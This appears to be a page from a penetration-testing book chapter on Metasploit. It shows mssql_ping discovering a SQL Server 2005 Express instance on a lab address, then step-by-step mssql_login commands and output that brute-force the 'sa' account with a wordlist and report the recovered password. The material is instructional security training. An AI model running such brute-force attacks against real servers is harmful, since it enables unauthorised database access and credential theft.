78
Chapter 6
[*] SQL Server information for 192.168.33.130:
[*] ServerName = IHAZSECURITY
[*] InstanceName = SQLEXPRESS
[*] IsClustered = No
[*] Version = 9.00.1399.06
[*] tcp = 1433
[*] np = \\IHAZSECURITY\pipe\MSSQL$SQLEXPRESS\sql\query
[*] Scanned 129 of 256 hosts (050% complete)
After calling the
mssql_ping
module with
use scanner/mssql/mssql_ping
and setting our options, we see that a SQL Server installation is found at
192.168.33.130 . The name of the server is
IHAZSECURITY
. Its version
number 9.00.1399.06 shown at equates to SQL Server 2005 Express, and
we know that it’s listening on TCP port 1433 .
Brute Forcing MS SQL Server
Next, we brute force the server with the Framework’s
mssql_login
module:
msf >
use scanner/mssql/mssql_login
msf auxiliary(mssql_login) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no The password for the specified username
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USERPASS_FILE no File containing users and passwords
separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mssql_login) >
set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt
msf auxiliary(mssql_login) >
set RHOSTS 192.168.33.130
RHOSTS => 192.168.33.130
msf auxiliary(mssql_login) >
set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) >
set verbose false
verbose => false
msf auxiliary(mssql_login) >
exploit
[+] 192.168.33.130:1433 - MSSQL - successful login 'sa' :
'password123'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed